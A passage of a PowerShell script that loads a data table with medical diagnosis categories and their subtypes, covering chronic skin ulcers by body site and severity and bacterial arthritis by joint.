ankle","Non-pressure chronic ulcer of left ankle limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left ankle","Non-pressure chronic ulcer of left ankle with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left ankle","Non-pressure chronic ulcer of left ankle with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left ankle","Non-pressure chronic ulcer of left ankle with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left ankle","Non-pressure chronic ulcer of left ankle with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left ankle","Non-pressure chronic ulcer of left ankle with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left ankle","Non-pressure chronic ulcer of left ankle with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left ankle","Non-pressure chronic ulcer of left ankle with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified heel and midfoot","Non-pressure chronic ulcer of unspecified heel and midfoot with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of right heel and midfoot","Non-pressure chronic ulcer of right heel and midfoot with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of left heel and midfoot","Non-pressure chronic ulcer of left heel and midfoot with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified foot","Non-pressure chronic ulcer of other part of unspecified foot with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right foot","Non-pressure chronic ulcer of other part of right foot with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left foot","Non-pressure chronic ulcer of other part of left foot with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of unspecified lower leg","Non-pressure chronic ulcer of other part of unspecified lower leg with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of right lower leg","Non-pressure chronic ulcer of other part of right lower leg with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of other part of left lower leg","Non-pressure chronic ulcer of other part of left lower leg with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of unspecified lower leg","Non-pressure chronic ulcer of unspecified part of unspecified lower leg with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of right lower leg","Non-pressure chronic ulcer of unspecified part of right lower leg with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of unspecified part of left lower leg","Non-pressure chronic ulcer of unspecified part of left lower leg with unspecified severity") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue, not elsewhere classified","Pyogenic granuloma") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue, not elsewhere classified","Factitial dermatitis") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue, not elsewhere classified","Febrile neutrophilic dermatosis [Sweet]") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue, not elsewhere classified","Eosinophilic cellulitis [Wells]") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of buttock","Non-pressure chronic ulcer of buttock with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of back","Non-pressure chronic ulcer of back with unspecified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of skin of other sites limited to breakdown of skin") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of skin of other sites with fat layer exposed") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of skin of other sites with necrosis of muscle") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of skin of other sites with necrosis of bone") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of other sites with muscle involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of other sites with bone involvement without evidence of necrosis") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of other sites with other specified severity") + $null = $DiagnosisList.Rows.Add("Non-pressure chronic ulcer of skin of other sites","Non-pressure chronic ulcer of skin of other sites with unspecified severity") + $null = $DiagnosisList.Rows.Add("Mucinosis of the skin","Mucinosis of the skin") + $null = $DiagnosisList.Rows.Add("Other infiltrative disorders of the skin and subcutaneous tissue","Other infiltrative disorders of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Excessive and redundant skin and subcutaneous tissue","Excessive and redundant skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Other specified disorders of the skin and subcutaneous tissue","Other specified disorders of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Disorder of the skin and subcutaneous tissue, unspecified","Disorder of the skin and subcutaneous tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of skin and subcutaneous tissue in diseases classified elsewhere","Other disorders of skin and subcutaneous tissue in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis and polyarthritis","Staphylococcal arthritis, unspecified joint") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, shoulder","Staphylococcal arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, shoulder","Staphylococcal arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, shoulder","Staphylococcal arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, elbow","Staphylococcal arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, elbow","Staphylococcal arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, elbow","Staphylococcal arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, wrist","Staphylococcal arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, wrist","Staphylococcal arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, wrist","Staphylococcal arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, hand","Staphylococcal arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, hand","Staphylococcal arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, hand","Staphylococcal arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, hip","Staphylococcal arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, hip","Staphylococcal arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, hip","Staphylococcal arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, knee","Staphylococcal arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, knee","Staphylococcal arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, knee","Staphylococcal arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, ankle and foot","Staphylococcal arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, ankle and foot","Staphylococcal arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, ankle and foot","Staphylococcal arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Staphylococcal arthritis, vertebrae","Staphylococcal arthritis, vertebrae") + $null = $DiagnosisList.Rows.Add("Staphylococcal polyarthritis","Staphylococcal polyarthritis") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis and polyarthritis","Pneumococcal arthritis, unspecified joint") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, shoulder","Pneumococcal arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, shoulder","Pneumococcal arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, shoulder","Pneumococcal arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, elbow","Pneumococcal arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, elbow","Pneumococcal arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, elbow","Pneumococcal arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, wrist","Pneumococcal arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, wrist","Pneumococcal arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, wrist","Pneumococcal arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, hand","Pneumococcal arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, hand","Pneumococcal arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, hand","Pneumococcal arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, hip","Pneumococcal arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, hip","Pneumococcal arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, hip","Pneumococcal arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, knee","Pneumococcal arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, knee","Pneumococcal arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, knee","Pneumococcal arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, ankle and foot","Pneumococcal arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, ankle and foot","Pneumococcal arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, ankle and foot","Pneumococcal arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Pneumococcal arthritis, vertebrae","Pneumococcal arthritis, vertebrae") + $null = $DiagnosisList.Rows.Add("Pneumococcal polyarthritis","Pneumococcal polyarthritis") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis and polyarthritis","Other streptococcal arthritis, unspecified joint") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, shoulder","Other streptococcal arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, shoulder","Other streptococcal arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, shoulder","Other streptococcal arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, elbow","Other streptococcal arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, elbow","Other streptococcal arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, elbow","Other streptococcal arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, wrist","Other streptococcal arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, wrist","Other streptococcal arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, wrist","Other streptococcal arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, hand","Other streptococcal arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, hand","Other streptococcal arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, hand","Other streptococcal arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, hip","Other streptococcal arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, hip","Other streptococcal arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, hip","Other streptococcal arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, knee","Other streptococcal arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, knee","Other streptococcal arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, knee","Other streptococcal arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, ankle and foot","Other streptococcal arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, ankle and foot","Other streptococcal arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, ankle and foot","Other streptococcal arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other streptococcal arthritis, vertebrae","Other streptococcal arthritis, vertebrae") + $null = $DiagnosisList.Rows.Add("Other streptococcal polyarthritis","Other streptococcal polyarthritis") + $null = $DiagnosisList.Rows.Add("Arthritis and polyarthritis due to other bacteria","Arthritis due to other bacteria, unspecified joint") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, shoulder","Arthritis due to other bacteria, right shoulder") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, shoulder","Arthritis due to other bacteria, left shoulder") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, shoulder","Arthritis due to other bacteria, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, elbow","Arthritis due to other bacteria, right elbow") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, elbow","Arthritis due to other bacteria, left elbow") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, elbow","Arthritis due to other bacteria, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, wrist","Arthritis due to other bacteria, right wrist") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, wrist","Arthritis due to other bacteria, left wrist") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, wrist","Arthritis due to other bacteria, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, hand","Arthritis due to other bacteria, right hand") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, hand","Arthritis due to other bacteria, left hand") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, hand","Arthritis due to other bacteria, unspecified hand") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, hip","Arthritis due to other bacteria, right hip") + $null = $DiagnosisList.Rows.Add("Arthritis due to other bacteria, hip","Arthritis due to other bacteria, 